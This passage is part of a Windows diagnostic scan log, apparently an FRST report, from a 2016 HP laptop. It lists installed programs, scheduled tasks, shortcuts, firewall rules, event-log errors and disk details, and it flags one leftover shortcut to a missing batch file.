Mirror Magic (HKLM-x32\...\exent_764150) (Version: - )
Mortimer Beckett Double Pack (HKLM-x32\...\d7390ee1a0664e5d7ee040b11c6c5052) (Version: - )
Mozilla Firefox 50.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.0.2 (x86 en-US)) (Version: 50.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.0.2.6177 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
Off the Record: Linden Shades Collector's Edition (HKLM-x32\...\BFG-Off the Record - Linden Shades Collector's Edition) (Version: - )
Online Games Manager v1.50 (HKLM-x32\...\Online Games Manager) (Version: 1.50.4 - Real Networks, Inc.)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
PhotoNow! (x32 Version: 1.1.6904 - CyberLink Corp.) Hidden
Plants vs. Zombies (x32 Version: 2.2.0.95 - WildTangent) Hidden
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4204 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.)
PowerDirector (x32 Version: 8.0.3003 - CyberLink Corp.) Hidden
Puzzle Solitaire (remove only) (HKLM-x32\...\Puzzle Solitaire) (Version: - )
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.18.322.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6206 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30120 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.3023 - CyberLink Corp.) Hidden
Romance of Rome (HKLM-x32\...\4e22301604a3a670489ec087182c3f06) (Version: - )
RtVOsd (HKLM\...\{091A0130-A82F-4A6D-9C61-3BBBB3289030}) (Version: 1.0.6 - Realtek Semiconductor Corp.)
Scrabble v2.0 (HKLM-x32\...\Scrabble v2.0) (Version: - )
Slingo Deluxe (HKLM-x32\...\Slingo Deluxe) (Version: 1.0.11 - funkitron)
Spin and Win (remove only) (HKLM-x32\...\Spin and Win) (Version: - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.1.6.64 - Synaptics Incorporated)
Trend Micro Internet Security (HKLM\...\{ABBD4BA8-6703-40D2-AB1E-5BB1F7DB49A4}) (Version: 10.0 - Trend Micro Inc.)
Trend Micro Password Manager (HKLM\...\3A0FB4E3-2C0D-4572-A24D-67F1CAABDDP35_is1) (Version: 3.7.0.1100 - Trend Micro Inc.)
Trend Micro Titanium (Version: 10.0 - Trend Micro Inc.) Hidden
Unit Layers (HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Unit Layers) (Version: 9.0 - Unit Layers)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Virtual Families (x32 Version: 2.2.0.95 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.95 - WildTangent) Hidden
WeatherBug® (HKLM-x32\...\WeatherBug®) (Version: 10.0.5.29 - Earth Networks, Inc.)
Wedding Salon (HKLM-x32\...\ecf17be8f49bd825ea5bc167b3c3e6d3) (Version: - )
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (HP Games) (x32 Version: 4.0.10.16 - WildTangent) Hidden
WildTangent Games App (x32 Version: 4.0.10.16 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Word Bird Supreme (HKLM-x32\...\9d7a5d47589c0698700923dd986fcfa3) (Version: - )
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {20E9FB50-D830-4C65-944B-35B95739ADE1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-26] (Google Inc.)
Task: {2E942A7E-FA99-4DD3-BD9F-92E9AEDE3BA3} - System32\Tasks\ServicePlan => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {3E9FC981-8B08-4455-AE56-6D1AFEDDD25B} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {43C92693-EB45-4EAB-9194-65333F008151} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-26] (Google Inc.)
Task: {548B28FD-136A-485C-BD28-9BDF6807032D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-23] (HP Inc.)
Task: {60462EB9-2F6D-47D8-9B7F-1254D9A8387D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-12] (Adobe Systems Incorporated)
Task: {637754C7-7447-4AC3-936D-4523EF69C19A} - System32\Tasks\HPCustParticipation HP Photosmart 7510 series => C:\Program Files\HP\HP Photosmart 7510 series\Bin\HPCustPartic.exe [2011-08-31] (Hewlett-Packard Co.)
Task: {6ED8EB46-0910-4360-9CAE-19E27455902B} - System32\Tasks\HPCeeScheduleForOwner => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-05-12] (HP Development Company, L.P.)
Task: {7FA7EA55-5648-4603-9A45-529DEBE3EA3D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-23] (HP Inc.)
Task: {804BCEAE-303E-4887-8566-789AF9878FD3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-08-03] (HP Inc.)
Task: {93D805C2-029B-4887-9BF0-D07E575FB62D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-08-15] (HP Inc.)
Task: {C3107BB7-3615-46DF-8762-60FA1BFFC646} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {EA6AB54C-AD98-4079-8DC5-8AF42DF153E4} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\Pogo Games\PogoDGC.exe
Task: {F3720C23-BEEA-49AF-B7D8-9E5993FBE08B} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForOwner.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk -> C:\Users\Owner\AppData\Local\767c1f6b\364acf2b.bat (No File)

ShortcutWithArgument: C:\Users\Owner\Desktop\Play Dream Day Wedding - Married in Manhatten.lnk -> C:\Remote Programs\Dream Day Wedding - Married in Manhatten\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=628950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play Legends of Solitaire Curse of the Dragons.lnk -> C:\Remote Programs\Legends of Solitaire Curse of the Dragons\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807150&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play Solitaire Kingdom Supreme.lnk -> C:\Remote Programs\Solitaire Kingdom Supreme\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=725950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play The Chronicles of Emerland Solitaire.lnk -> C:\Remote Programs\The Chronicles of Emerland Solitaire\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Villa Banana\Play Villa Banana.lnk -> C:\Remote Programs\Villa Banana\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=738050&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\The Chronicles of Emerland Solitaire\Play The Chronicles of Emerland Solitaire.lnk -> C:\Remote Programs\The Chronicles of Emerland Solitaire\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Solitaire Kingdom Supreme\Play Solitaire Kingdom Supreme.lnk -> C:\Remote Programs\Solitaire Kingdom Supreme\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=725950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Legends of Solitaire Curse of the Dragons\Play Legends of Solitaire Curse of the Dragons.lnk -> C:\Remote Programs\Legends of Solitaire Curse of the Dragons\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807150&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Dream Day Wedding - Married in Manhatten\Play Dream Day Wedding - Married in Manhatten.lnk -> C:\Remote Programs\Dream Day Wedding - Married in Manhatten\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=628950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default

==================== Loaded Modules (Whitelisted) ==============

2016-02-21 08:34 - 2015-07-16 13:31 - 00018944 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_system-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00049664 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_date_time-vc110-mt-1_52.dll
2014-09-05 19:56 - 2013-11-13 14:08 - 00146736 ____N () C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
2016-02-21 08:34 - 2015-07-16 13:31 - 00089088 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_thread-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00761856 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_regex-vc110-mt-1_52.dll
2016-02-21 08:30 - 2014-08-01 19:17 - 00048128 _____ () C:\Program Files\Trend Micro\TMIDS\boost_date_time-vc110-mt-1_49.dll
2016-02-21 08:30 - 2016-09-01 13:31 - 40970752 _____ () C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
2010-06-10 18:42 - 2010-06-10 18:42 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-09-28 03:35 - 2010-09-28 03:35 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00030264 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_LogicLayer.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00052280 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HardwareAccess.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00267832 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPCommon.XmlSerializers.dll
2015-12-15 13:38 - 2015-12-15 13:38 - 00326112 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\dblite.dll
2015-10-27 16:44 - 2015-10-27 16:44 - 00404952 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\ipm_service.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 45077376 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libcef.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00061440 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00131072 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\ECenter\ECLibrary.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00040960 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00005632 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00018944 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00036864 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Microsoft.Practices.EnterpriseLibrary.ExceptionHandling.Logging.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00007680 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 01650560 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libglesv2.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 00082304 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\trendmicro.com -> hxxps://pwm.trendmicro.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2016-11-30 15:10 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{ECC83859-F826-4E60-8C70-2679218588B5}] => C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{2FD18DD4-08D1-44F4-90D1-0C71DB9B0B85}] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{CACE2A3F-94D0-4A90-9C85-DE45A5BB75A9}] => svchost.exe
FirewallRules: [{6E2A430E-41B8-4970-9896-E5137A06EF68}] => C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{A3A4B663-7DAA-4562-A680-C47CAC7A17FC}] => C:\Program Files (x86)\CyberLink\PowerDirector\PDR8.EXE
FirewallRules: [{AE3861D2-CD1F-47FF-9724-E3A282EA073E}] => C:\Program Files (x86)\Hewlett-Packard\MediaSmart\CinemaNow\CinemaNow.exe
FirewallRules: [{A8C797C8-01D0-4B39-A2E5-574546EEB978}] => C:\Program Files (x86)\Hewlett-Packard\MediaSmart\CinemaNow\CinemaNow.exe
FirewallRules: [{8F1ED23F-8124-47F8-BD9F-A386ACF70127}] => C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowShell.exe
FirewallRules: [{C993DBB6-02E1-43C3-85E5-32CF3ACCA4C5}] => C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowShell.exe
FirewallRules: [{2BDDBF74-AC62-49DB-BB26-236F0777BDF0}] => C:\Program Files (x86)\CyberLink\PowerDVD9\PowerDVD9.EXE
FirewallRules: [{89DAFBC5-CE52-4EA8-B5F6-E4E11A7574D2}] => C:\Program Files\HP\HP Photosmart 7510 series\Bin\DeviceSetup.exe
FirewallRules: [{1589E52E-1E4D-4A40-98A8-B29A66DAAB59}] => C:\Program Files\HP\HP Photosmart 7510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [TCP Query User{F45D6C64-5311-4C97-94C4-415A65CA7E57}C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe] => C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe
FirewallRules: [UDP Query User{2F6C9022-660B-40F7-92F1-7CA32B6A4B77}C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe] => C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe
FirewallRules: [TCP Query User{C919D2B6-A863-4693-88C5-B6D935A25902}C:\windows\syswow64\dplaysvr.exe] => C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{F017EC39-E28A-4239-A5D7-AD7A6E2D67DF}C:\windows\syswow64\dplaysvr.exe] => C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{12D1A36E-E588-471C-A733-0AAED90E0A96}C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe] => C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe
FirewallRules: [UDP Query User{29FFD94E-99E7-473A-A2E0-FE6F191742A7}C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe] => C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe
FirewallRules: [{95C62BB0-D859-4E2A-A64D-8D8BBA8713A8}] => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{A913A0C9-B9F1-41E5-9390-AEFE15BA282E}] => C:\Program Files (x86)\Pogo Games\PogoDGC.exe
FirewallRules: [{4CC961E5-0940-4383-A41A-33B1D705CA94}] => C:\Program Files (x86)\Pogo Games\PogoDGC.exe
FirewallRules: [{27C90A35-DF5A-4E93-81EF-A588F39C847B}] => C:\Program Files (x86)\Pogo Games\WebUpdater.exe
FirewallRules: [{4F12C549-3FEB-4BEB-84FF-242D4191D08B}] => C:\Program Files (x86)\Pogo Games\WebUpdater.exe
FirewallRules: [{DF3D7CBC-116B-41C7-80CF-EDBF386A68ED}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{07751770-2A7C-4575-8FA9-97329195C28E}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{807F2D7A-B2ED-429A-AE1E-B61DF684C77C}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4CD107E7-A2A0-4768-96A3-228E003EE820}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A20F1399-AB43-4ECC-A227-35DC9F054463}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

21-02-2016 09:37:25 Scheduled Checkpoint
28-02-2016 14:02:23 Scheduled Checkpoint
23-03-2016 18:16:58 Scheduled Checkpoint
25-11-2016 17:41:05 Installed HP Support Assistant
25-11-2016 18:46:00 Windows Modules Installer
26-11-2016 04:54:50 Windows Modules Installer
26-11-2016 04:56:47 Windows Modules Installer
26-11-2016 04:59:57 Windows Update
30-11-2016 15:09:48 Restore Point Created by FRST

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (12/01/2016 02:19:00 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (12/01/2016 09:11:18 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (12/01/2016 04:28:48 AM) (Source: Application Virtualization Client) (EventID: 6034) (User: )
Description: {tid=1B90}
Error ( 32 ) moving staged settings file ( Q:\140066.ENU\SoftGridUserSettings\S-1-5-21-2406275642-2542123288-3132197554-1000\settings.cp.temp )

Error: (11/30/2016 03:46:07 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/30/2016 03:10:03 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary X5XSEx_Pr143.

System Error:
The system cannot find the file specified.
.

Error: (11/30/2016 03:09:46 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface. hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {0bbdc0fc-82d5-4c77-8f4c-0686f2aa60f7}

Error: (11/29/2016 09:07:34 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/29/2016 02:43:31 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/29/2016 08:45:25 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/28/2016 02:02:21 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

System errors:
=============
Error: (12/01/2016 02:06:28 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Password Manager Central Control Service service hung on starting.

Error: (12/01/2016 08:58:52 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Password Manager Central Control Service service hung on starting.

Error: (12/01/2016 08:56:32 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Application Virtualization Client service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (12/01/2016 08:56:32 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Application Virtualization Client service to connect.

Error: (12/01/2016 02:35:45 AM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The backup browser is stopping.

Error: (12/01/2016 02:34:58 AM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer ERIC-PC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The master browser is stopping or an election is being forced.

Error: (12/01/2016 02:30:55 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.

Error: (11/30/2016 05:16:31 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer ERIC-PC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The master browser is stopping or an election is being forced.

Error: (11/30/2016 03:19:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Application Virtualization Client service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (11/30/2016 03:19:44 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Application Virtualization Client service to connect.

==================== Memory info ===========================

Processor: AMD Athlon™ II P340 Dual-Core Processor
Percentage of memory in use: 59%
Total physical RAM: 2810.9 MB
Available physical RAM: 1148.86 MB
Total Virtual: 5620.01 MB
Available Virtual: 3086.27 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:281.48 GB) (Free:207.81 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:16.31 GB) (Free:2.35 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 82337274)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=281.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16.3 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

